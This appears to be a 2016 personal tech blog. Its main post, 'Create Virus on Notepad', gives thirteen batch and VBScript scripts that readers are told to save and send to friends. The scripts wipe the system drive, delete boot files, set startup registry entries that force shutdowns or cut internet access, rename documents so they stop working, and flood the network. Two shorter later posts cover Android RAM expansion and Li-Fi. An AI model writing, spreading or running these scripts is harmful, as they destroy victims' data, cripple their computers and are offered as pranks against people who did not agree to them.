Sunday, May 22, 2016

Create Virus on Notepad

1 -> Virus Creation Tricks 1

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”


Now Save This Notepad file With Any Name Having  .vbs Extension . 

2 -> Virus Creation Trick  2 .
Open Notepad and write "start" without quotes 
Start
Start
Start 

and then save it with .bat extension. 
Now double click on this .bat file to run Command Prompt.

 3 -> Virus Creation Trick 3 
Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
 
Save it as "Anything.BAT" in All Files and send it. 

4 -> Virus Creation Trick 4 
Toggle your friend's Caps Lock button simultaneously:
Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it. 

5 -> Virus Creation Trick 5 
Frustrate your friend by making this VBScript hit Enter simultaneously:Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
   

6 -> Virus Creation Trick 6  
This Virus Deletes All The Content Of A Drive... 

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat 




7 -> Virus Creation Trick 7
This Will Crash Ur Computer 
Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs 
 
 8 -> Virus Creation Trick 8
The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y
 
Save It As Anything.bat 

 9 -> Virus Creation Trick 9
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

Save As Anything.bat File In Notepad!!This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


10 -> Virus Creation Trick 10
Shutdowns Computer Everytime It Is Turned On
Save As A bat File
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

11 -> Virus Creation Trick 11
Disable Internet Permanently
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File
 
  
12 -> Virus Creation Trick 12 
Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

  

13 -> Virus Creation Trick 13 
System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File



Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will 
automatically shutdown on every startup !

Tuesday, May 10, 2016

Is Ram of Android devices actually increased

Android devices Ram are predefined.... Those hardware are pre-installed..... Means a 16gb card is capable of only 16gb.... It's can't be expanded... Nor any other storage device can split nd give its storage to it....... Like this only.... Same about ram concept..... Ram is predefined.... Nd it can't be increased..... Ram is based on processor capacity.... Means it's working process is defined by processor.... So it can only be used when that much amount of ram is needed for a certain task.....
  Some people increase their ram by rooting the devices.... Nd expanding the ram memory by splitting SD cards... And giving that memory as a ram..... Procedurely it's correct... But technical it's not working..... Bcz both are different... So the processor uses only the hardware ram which is pre-installed.... Nd this virtual ram is not used..... So actually this ram  which is made from SD card is not used at all....
  So guys the concept of ram expansion by SD card partition is fully wrong.... Technical it can't be done.... So guys pls don't waste your time in doing ram expansion....
Thanx guys.... Share this blog for more new tech tips nd tricks...

Monday, May 9, 2016

New tech Li-Fi



                 Hi guys lets talk about the new techinology which is bought a years ago...Li-Fi



              Light Fidelity (Li-Fi) is a bidirectional, high speed and fully networked wireless communication technology similar to Wi-Fi. The term was coined by Harald Haas and is a form of visible light communication and a subset ofoptical wireless communications (OWC) and could be a complement to RF communication (Wi-Fi or Cellular network), or even a replacement in contexts of data broadcasting. It is so far measured to be about 100 times faster than some Wi-Fi implementations, reaching speeds of 224 gigabits per second.
It is wireless and uses visible light communication or infra-red and near ultraviolet (instead of radio frequency waves) spectrum, part of optical wireless communications technology, which carries much more information, and has been proposed as a solution to the RF-bandwidth limitations.

Technology details

This OWC technology uses light from light-emitting diodes (LEDs) as a medium to deliver networked, mobile, high-speed communication in a similar manner to Wi-Fi. The Li-Fi market is projected to have a compound annual growth rate of 82% from 2013 to 2018 and to be worth over $6 billion per year by 2018.
Visible light communications (VLC) works by switching the current to the LEDs off and on at a very high rate, too quick to be noticed by the human eye. Although Li-Fi LEDs would have to be kept on to transmit data, they could be dimmed to below human visibility while still emitting enough light to carry data. The light waves cannot penetrate walls which makes a much shorter range, though more secure from hacking, relative to Wi-Fi. Direct line of sight is not necessary for Li-Fi to transmit a signal; light reflected off the walls can achieve 70 Mbit/s.
Li-Fi has the advantage of being useful in electromagnetic sensitive areas such as in aircraft cabins, hospitals and nuclear power plants without causing electromagnetic interference. Both Wi-Fi and Li-Fi transmit data over the electromagnetic spectrum, but whereas Wi-Fi utilizes radio waves, Li-Fi uses visible light. While the US Federal Communications Commission has warned of a potential spectrum crisis because Wi-Fi is close to full capacity, Li-Fi has almost no limitations on capacity.The visible light spectrum is 10,000 times larger than the entire radio frequency spectrum. Researchers have reached data rates of over 10 Gbit/s, which is much faster than typical fast broadband in 2013. Li-Fi is expected to be ten times cheaper than Wi-Fi.[7] Short range, low reliability and high installation costs are the potential downsides.
PureLiFi demonstrated the first commercially available Li-Fi system, the Li-1st, at the 2014 Mobile World Congress in Barcelona.
Bg-Fi is a Li-Fi system consisting of an application for a mobile device, and a simple consumer product, like an IoT (Internet of Things) device, with color sensor, microcontroller, and embedded software. Light from the mobile device display communicates to the color sensor on the consumer product, which converts the light into digital information. Light emitting diodes enable the consumer product to communicate synchronously with the mobile device.

History

Harald Haas, who teaches at the University of Edinburgh in the UK, coined the term "Li-Fi" at his TED Global Talk where he introduced the idea of "Wireless data from every light". He is Chair of Mobile Communications at the University of Edinburgh and co-founder of pureLiFi.
The general term visible light communication (VLC), whose history dates back to the 1880s, includes any use of the visible light portion of the electromagnetic spectrum to transmit information. The D-Light project at Edinburgh's Institute for Digital Communications was funded from January 2010 to January 2012. Haas promoted this technology in his 2011 TED Global talk and helped start a company to market it. PureLiFi, formerly pureVLC, is an original equipment manufacturer (OEM) firm set up to commercialize Li-Fi products for integration with existing LED-lighting systems.
In October 2011, companies and industry groups formed the Li-Fi Consortium, to promote high-speed optical wireless systems and to overcome the limited amount of radio-based wireless spectrum available by exploiting a completely different part of the electromagnetic spectrum.
A number of companies offer uni-directional VLC products, which is not the same as Li-Fi - a term defined by the IEEE 802.15.7r1 standardization committee.
VLC technology was exhibited in 2012 using Li-Fi. By August 2013, data rates of over 1.6 Gbit/s were demonstrated over a single color LED. In September 2013, a press release said that Li-Fi, or VLC systems in general, do not require line-of-sight conditions. In October 2013, it was reported Chinese manufacturers were working on Li-Fi development kits.[31]
In April 2014, the Russian company Stins Coman announced the development of a Li-Fi wireless local network called BeamCaster. Their current module transfers data at 1.25 gigabytes per second but they foresee boosting speeds up to 5 GB/second in the near future. In 2014 a new record was established by Sisoft (a Mexican company) that was able to transfer data at speeds of up to 10 Gbit/s across a light spectrum emitted by LED lamps.

Standards

Like Wi-Fi, Li-Fi is wireless and uses similar 802.11 protocols; but it uses visible light communication (instead of radio frequency waves), which has much wider bandwidth.
One part of VLC is modeled after communication protocols established by the IEEE 802 workgroup. However, the IEEE 802.15.7 standard is out-of-date, it fails to consider the latest technological developments in the field of optical wireless communications, specifically with the introduction of optical orthogonal frequency-division multiplexing (O-OFDM) modulation methods which have been optimized for data rates, multiple-access and energy efficiency.The introduction of O-OFDM means that a new drive for standardization of optical wireless communications is required.
Nonetheless, the IEEE 802.15.7 standard defines the physical layer (PHY) and media access control (MAC) layer. The standard is able to deliver enough data rates to transmit audio, video and multimedia services. It takes into account optical transmission mobility, its compatibility with artificial lighting present in infrastructures, and the interference which may be generated by ambient lighting. The MAC layer permits using the link with the other layers as with the TCP/IP protocol.
The standard defines three PHY layers with different rates:
  • The PHY I was established for outdoor application and works from 11.67 kbit/s to 267.6 kbit/s.
  • The PHY II layer permits reaching data rates from 1.25 Mbit/s to 96 Mbit/s.
  • The PHY III is used for many emissions sources with a particular modulation method called color shift keying (CSK). PHY III can deliver rates from 12 Mbit/s to 96 Mbit/s.
The modulation formats recognized for PHY I and PHY II are on-off keying (OOK) and variable pulse position modulation (VPPM). The Manchester coding used for the PHY I and PHY II layers includes the clock inside the transmitted data by representing a logic 0 with an OOK symbol "01" and a logic 1 with an OOK symbol "10", all with a DC component. The DC component avoids light extinction in case of an extended run of logic 0's.
The first VLC smartphone prototype was presented at the Consumer Electronics Show in Las Vegas from January 7–10 in 2014. The phone uses SunPartner's Wysips CONNECT, a technique that converts light waves into usable energy, making the phone capable of receiving and decoding signals without drawing on its battery. A clear thin layer of crystal glass can be added to small screens like watches and smartphones that make them solar powered. Smartphones could gain 15% more battery life during a typical day. This first smartphones using this technology should arrive in 2015. This screen can also receive VLC signals as well as the smartphone camera. The cost of these screens per smartphone is between $2 and $3, much cheaper than most new technology.
Philips lighting company has developed a VLC system for shoppers at stores. They have to download an app on their smartphone and then their smartphone works with the LEDs in the store. The LEDs can pinpoint where they are located in the store and give them corresponding coupons and information based on which aisle they are on and what they are looking at.







What is Li-Fi technology?

Li-Fi technology is a ground-breaking light-based communication technology, which makes use of light waves instead of radio technology to deliver data.

Li-Fi can compensate as the radio spectrum becomes overloaded


Using the visible light spectrum, Li-Fi technology can transmit data and unlock capacity which is 10,000 times greater than that available within the radio spectrum.
The visible light spectrum is plentiful, free and unlicensed, mitigating the radio frequency spectrum crunch effect.

The future internet

Li-Fi technology will in future enable faster, more reliable internet connections, even when the demand for data usage has outgrown the available supply from existing technologies such as 4G, LTE and Wi-Fi. It will not replace these technologies, but will work seamlessly alongside them.
Using light to deliver wireless internet will also allow connectivity in environments that do not currently readily support Wi-Fi, such as aircraft cabins, hospitals and hazardous environments.
Light is already used for data transmission in fibre-optic cables and for point to point links, but Li-Fi is a special and novel combination of technologies that allow it to be universally adopted for mobile ultra high speed internet communications.

A dual use for LED lighting

The wide use of solid state lighting offers an opportunity for efficient dual use lighting and communication systems.
Innovation in LED and photon receiver technology has ensured the availability of suitable light transmitters and detectors, while advances in the modulation of communication signals for these types of components has been advanced through signal processing techniques, such as multiple-input-multiple-output (MIMO), to become as sophisticated as those used in mobile telecommunications.

An integrated communication solution

Li-Fi technology is being developed into a ubiquitous systems technology, consisting of application specific combinations of light transmitters, light receivers including solar cells, efficient computational algorithms and networking capabilities that can be deployed in a wide range of communication scenarios and in a variety of device platforms.

New blog for tech tips nd tricks

Hi guys this is my all new blog for the latest tech concepts and douts regarding any tech ....
I am starting this blog from today its self...So pls share it ..if u liked it....